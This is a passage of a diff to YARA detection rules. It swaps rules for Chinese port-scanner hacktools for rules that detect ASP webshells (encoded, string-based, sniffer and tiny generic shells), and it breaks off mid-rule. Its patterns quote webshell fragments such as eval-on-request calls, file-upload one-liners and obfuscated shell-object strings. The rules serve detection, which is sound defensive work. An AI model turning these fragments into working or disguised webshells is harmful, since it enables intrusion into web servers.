+		$asp_multi_payload_five2 = ".Start" nocase wide ascii
+		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
+		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
 
 	condition:
-		all of them
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) and not any of ( $fp* ) and ( filesize < 200 or ( filesize < 1000 and any of ( $susasp* ) ) )
 }
-rule SIGNATURE_BASE_CN_Hacktool_S_EXE_Portscanner
+rule SIGNATURE_BASE_WEBSHELL_ASP_Encoded : FILE
 {
 	meta:
-		description = "Detects a chinese Portscanner named s.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d6b35d4f-7e25-50dd-bef2-08f7033312e8"
-		date = "2014-12-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L652-L666"
+		description = "Webshell in VBscript or JScript encoded using *.Encode plus a suspicious string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "67c0e1f6-6da5-569c-ab61-8b8607429471"
+		date = "2021-03-14"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3660-L3770"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "658ae90f3af3c7abec6e692b6be350939ba7b654a9972d1a1016ff33e815a1de"
-		score = 70
-		quality = 85
-		tags = ""
+		hash = "1bc7327f9d3dbff488e5b0b69a1b39dcb99b3399"
+		hash = "9885ee1952b5ad9f84176c9570ad4f0e32461c92"
+		hash = "27a020c5bc0dbabe889f436271df129627b02196"
+		hash = "f41f8c82b155c3110fc1325e82b9ee92b741028b"
+		hash = "af40f4c36e3723236c59dc02f28a3efb047d67dd"
+		logic_hash = "dc33423874a49edfe9994db50959e6a55e2d475f4cd7d0b1b0a288c4ee1f7961"
+		score = 75
+		quality = -24
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "\\Result.txt" ascii
-		$s1 = "By:ZT QQ:376789051" fullword ascii
-		$s2 = "(http://www.eyuyan.com)" fullword wide
+		$encoded1 = "VBScript.Encode" nocase wide ascii
+		$encoded2 = "JScript.Encode" nocase wide ascii
+		$data1 = "#@~^" wide ascii
+		$sus1 = "shell" nocase wide ascii
+		$sus2 = "cmd" fullword wide ascii
+		$sus3 = "password" fullword wide ascii
+		$sus4 = "UserPass" fullword wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		all of them
+		filesize < 500KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $encoded* ) and any of ( $data* ) and ( any of ( $sus* ) or ( filesize < 20KB and #data1 > 4 ) or ( filesize < 700 and #data1 > 0 ) )
 }
-rule SIGNATURE_BASE_CN_Hacktool_Milkt_BAT
+rule SIGNATURE_BASE_WEBSHELL_ASP_Encoded_Aspcoding : FILE
 {
 	meta:
-		description = "Detects a chinese Portscanner named MilkT - shipped BAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d680a5f1-6182-5bc8-99de-c3cba1a61903"
-		date = "2014-12-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L668-L681"
+		description = "ASP Webshell encoded using ASPEncodeDLL.AspCoding"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "788a8dae-bcb8-547c-ba17-e1f14bc28f34"
+		date = "2021-03-14"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3772-L3878"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ad74c45db0ef52223eb4dd162a21c57074a4ecb869a841d836d14afc997a7478"
-		score = 70
-		quality = 85
-		tags = ""
+		hash = "7cfd184ab099c4d60b13457140493b49c8ba61ee"
+		hash = "f5095345ee085318235c11ae5869ae564d636a5342868d0935de7582ba3c7d7a"
+		logic_hash = "a0f0b8585b28b13a90c5d112997cacea00af8c89c81eda5edf05508ad41459ab"
+		score = 60
+		quality = -5
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
-		$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
+		$encoded1 = "ASPEncodeDLL" fullword nocase wide ascii
+		$encoded2 = ".Runt" nocase wide ascii
+		$encoded3 = "Request" fullword nocase wide ascii
+		$encoded4 = "Response" fullword nocase wide ascii
+		$data1 = "AspCoding.EnCode" wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		all of them
+		filesize < 500KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and all of ( $encoded* ) and any of ( $data* )
 }
-rule SIGNATURE_BASE_CN_Hacktool_Milkt_Scanner
+rule SIGNATURE_BASE_WEBSHELL_ASP_By_String : FILE
 {
 	meta:
-		description = "Detects a chinese Portscanner named MilkT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "aa83c983-25c2-5051-88a1-fbc70d947d6e"
-		date = "2014-12-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L683-L701"
+		description = "Known ASP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4705b28b-2ffa-53d1-b727-1a9fc2a7dd69"
+		date = "2021-01-13"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3880-L4058"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "707cbd625b5694b710d01622a053e60828da7f70b38e43012d04364137583fe9"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "f72252b13d7ded46f0a206f63a1c19a66449f216"
+		hash = "bd75ac9a1d1f6bcb9a2c82b13ea28c0238360b3a7be909b2ed19d3c96e519d3d"
+		hash = "56a54fe1f8023455800fd0740037d806709ffb9ece1eb9e7486ad3c3e3608d45"
+		hash = "4ef5d8b51f13b36ce7047e373159d7bb42ca6c9da30fad22e083ab19364c9985"
+		hash = "e90c3c270a44575c68d269b6cf78de14222f2cbc5fdfb07b9995eb567d906220"
+		hash = "8a38835f179e71111663b19baade78cc3c9e1f6fcc87eb35009cbd09393cbc53"
+		hash = "f2883e9461393b33feed4139c0fc10fcc72ff92924249eb7be83cb5b76f0f4ee"
+		hash = "10cca59c7112dfb1c9104d352e0504f842efd4e05b228b6f34c2d4e13ffd0eb6"
+		hash = "ed179e5d4d365b0332e9ffca83f66ee0afe1f1b5ac3c656ccd08179170a4d9f7"
+		hash = "ce3273e98e478a7e95fccce0a3d3e8135c234a46f305867f2deacd4f0efa7338"
+		hash = "65543373b8bd7656478fdf9ceeacb8490ff8976b1fefc754cd35c89940225bcf"
+		hash = "de173ea8dcef777368089504a4af0804864295b75e51794038a6d70f2bcfc6f5"
+		logic_hash = "b6ff83bc501753b893a0f5e60c6aafa292617279c0855ce3ba2d0b9b73325e8a"
+		score = 75
+		quality = -41
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "Bf **************" ascii fullword
-		$s1 = "forming Time: %d/" ascii
-		$s2 = "KERNEL32.DLL" ascii fullword
-		$s3 = "CRTDLL.DLL" ascii fullword
-		$s4 = "WS2_32.DLL" ascii fullword
-		$s5 = "GetProcAddress" ascii fullword
-		$s6 = "atoi" ascii fullword
+		$asp_string1 = "tseuqer lave" wide ascii
+		$asp_string2 = ":eval request(" wide ascii
+		$asp_string3 = ":eval request(" wide ascii
+		$asp_string4 = "SItEuRl=\"http://www.zjjv.com\"" wide ascii
+		$asp_string5 = "ServerVariables(\"HTTP_HOST\"),\"gov.cn\"" wide ascii
+		$asp_string6 = /e\+.-v\+.-a\+.-l/ wide ascii
+		$asp_string7 = "r+x-e+x-q+x-u" wide ascii
+		$asp_string8 = "add6bb58e139be10" fullword wide ascii
+		$asp_string9 = "WebAdmin2Y.x.y(\"" wide ascii
+		$asp_string10 = "<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request[" wide ascii
+		$asp_string11 = "<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request(" wide ascii
+		$asp_string12 = "UmVxdWVzdC5JdGVtWyJ" wide ascii
+		$asp_string13 = "UAdgBhAGwAKA" wide ascii
+		$asp_string14 = "lAHYAYQBsACgA" wide ascii
+		$asp_string15 = "ZQB2AGEAbAAoA" wide ascii
+		$asp_string16 = "IAZQBxAHUAZQBzAHQAKA" wide ascii
+		$asp_string17 = "yAGUAcQB1AGUAcwB0ACgA" wide ascii
+		$asp_string18 = "cgBlAHEAdQBlAHMAdAAoA" wide ascii
+		$asp_string19 = "\"ev\"&\"al" wide ascii
+		$asp_string20 = "\"Sc\"&\"ri\"&\"p" wide ascii
+		$asp_string21 = "C\"&\"ont\"&\"" wide ascii
+		$asp_string22 = "\"vb\"&\"sc" wide ascii
+		$asp_string23 = "\"A\"&\"do\"&\"d" wide ascii
+		$asp_string24 = "St\"&\"re\"&\"am\"" wide ascii
+		$asp_string25 = "*/eval(" wide ascii
+		$asp_string26 = "\"e\"&\"v\"&\"a\"&\"l" nocase
+		$asp_string27 = "<%eval\"\"&(\"" nocase wide ascii
+		$asp_string28 = "6877656D2B736972786677752B237E232C2A" wide ascii
+		$asp_string29 = "ws\"&\"cript.shell" wide ascii
+		$asp_string30 = "SerVer.CreAtEoBjECT(\"ADODB.Stream\")" wide ascii
+		$asp_string31 = "ASPShell - web based shell" wide ascii
+		$asp_string32 = "<++ CmdAsp.asp ++>" wide ascii
+		$asp_string33 = "\"scr\"&\"ipt\"" wide ascii
+		$asp_string34 = "Regex regImg = new Regex(\"[a-z|A-Z]{1}:\\\\\\\\[a-z|A-Z| |0-9|\\u4e00-\\u9fa5|\\\\~|\\\\\\\\|_|{|}|\\\\.]*\");" wide ascii
+		$asp_string35 = "\"she\"&\"ll." wide ascii
+		$asp_string36 = "LH\"&\"TTP" wide ascii
+		$asp_string37 = "<title>Web Sniffer</title>" wide ascii
+		$asp_string38 = "<title>WebSniff" wide ascii
+		$asp_string39 = "cript\"&\"ing" wide ascii
+		$asp_string40 = "tcejbOmetsySeliF.gnitpircS" wide ascii
+		$asp_string41 = "tcejbOetaerC.revreS" wide ascii
+		$asp_string42 = "This file is part of A Black Path Toward The Sun (\"ABPTTS\")" wide ascii
+		$asp_string43 = "if ((Request.Headers[headerNameKey] != null) && (Request.Headers[headerNameKey].Trim() == headerValueKey.Trim()))" wide ascii
+		$asp_string44 = "if (request.getHeader(headerNameKey).toString().trim().equals(headerValueKey.trim()))" wide ascii
+		$asp_string45 = "Response.Write(Server.HtmlEncode(ExcutemeuCmd(txtArg.Text)));" wide ascii
+		$asp_string46 = "\"c\" + \"m\" + \"d\"" wide ascii
+		$asp_string47 = "\".\"+\"e\"+\"x\"+\"e\"" wide ascii
+		$asp_string48 = "Tas9er" fullword wide ascii
+		$asp_string49 = "<%@ Page Language=\"\\u" wide ascii
+		$asp_string50 = "BinaryRead(\\u" wide ascii
+		$asp_string51 = "Request.\\u" wide ascii
+		$asp_string52 = "System.Buffer.\\u" wide ascii
+		$asp_string53 = "System.Net.\\u" wide ascii
+		$asp_string54 = ".\\u0052\\u0065\\u0066\\u006c\\u0065\\u0063\\u0074\\u0069\\u006f\\u006e\"" wide ascii
+		$asp_string55 = "\\u0041\\u0073\\u0073\\u0065\\u006d\\u0062\\u006c\\u0079.\\u004c\\u006f\\u0061\\u0064" wide ascii
+		$asp_string56 = "\\U00000052\\U00000065\\U00000071\\U00000075\\U00000065\\U00000073\\U00000074[\"" wide ascii
+		$asp_string57 = "*/\\U0000" wide ascii
+		$asp_string58 = "\\U0000FFFA" wide ascii
+		$asp_string59 = "\"e45e329feb5d925b\"" wide ascii
+		$asp_string60 = ">POWER!shelled<" wide ascii
+		$asp_string61 = "@requires xhEditor" wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		all of them
+		filesize < 200KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $asp_string* )
 }
-rule SIGNATURE_BASE_CN_Hacktool_1433_Scanner : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Sniffer : FILE
 {
 	meta:
-		description = "Detects a chinese MSSQL scanner"
-		author = "Florian Roth (Nextron Systems)"
-		id = "77712d29-1a32-59e7-999a-a2ef02212886"
-		date = "2014-12-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L703-L720"
+		description = "ASP webshell which can sniff local traffic"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b5704c19-fce1-5210-8185-4839c1c5a344"
+		date = "2021-03-14"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4060-L4195"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3e51e3596fc90bcea46236728da5437a9b6f56a42d64a651940321f575b32129"
-		score = 40
-		quality = 85
+		hash = "1206c22de8d51055a5e3841b4542fb13aa0f97dd"
+		hash = "60d131af1ed23810dbc78f85ee32ffd863f8f0f4"
+		hash = "c3bc4ab8076ef184c526eb7f16e08d41b4cec97e"
+		hash = "ed5938c04f61795834751d44a383f8ca0ceac833"
+		logic_hash = "874ec4c5dff024a899976e46cd553b52c361779a5507cf08ff0de596fd460d41"
+		score = 75
+		quality = -49
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "1433" wide fullword
-		$s1 = "1433V" wide
-		$s2 = "del Weak1.txt" ascii fullword
-		$s3 = "del Attack.txt" ascii fullword
-		$s4 = "del /s /Q C:\\Windows\\system32\\doors\\" ascii
-		$s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii
+		$sniff1 = "Socket(" wide ascii
+		$sniff2 = ".Bind(" wide ascii
+		$sniff3 = ".SetSocketOption(" wide ascii
+		$sniff4 = ".IOControl(" wide ascii
+		$sniff5 = "PacketCaptureWriter" fullword wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* )
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and filesize < 30KB and all of ( $sniff* )
 }
-rule SIGNATURE_BASE_CN_Hacktool_1433_Scanner_Comp2 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Tiny : FILE
 {
 	meta:
-		description = "Detects a chinese MSSQL scanner - component 2"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7d707be5-dad0-5d91-965b-908a8603b6c0"
-		date = "2014-12-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L722-L736"
+		description = "Generic tiny ASP webshell which uses any eval/exec function indirectly on user input or writes a file"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
+		date = "2021-01-07"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4197-L4404"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7c84d59a821531d9e741a05a23a911bb1caa825a18bb6532381e5ff38193c260"
-		score = 40
-		quality = 85
+		hash = "990e3f129b8ba409a819705276f8fa845b95dad0"
+		hash = "52ce724580e533da983856c4ebe634336f5fd13a"
+		hash = "0864f040a37c3e1cef0213df273870ed6a61e4bc"
+		hash = "b184dc97b19485f734e3057e67007a16d47b2a62"
+		logic_hash = "62012312876adb97f24ff39af041263d7678a4264374398907b2442731e586d7"
+		score = 75
+		quality = -102
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "1433" wide fullword
-		$s1 = "1433V" wide
-		$s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
+		$fp1 = "net.rim.application.ipproxyservice.AdminCommand.execute"
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
+		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$asp_payload0 = "eval_r" fullword nocase wide ascii
+		$asp_payload1 = /\beval\s/ nocase wide ascii
+		$asp_payload2 = /\beval\(/ nocase wide ascii
+		$asp_payload3 = /\beval\"\"/ nocase wide ascii
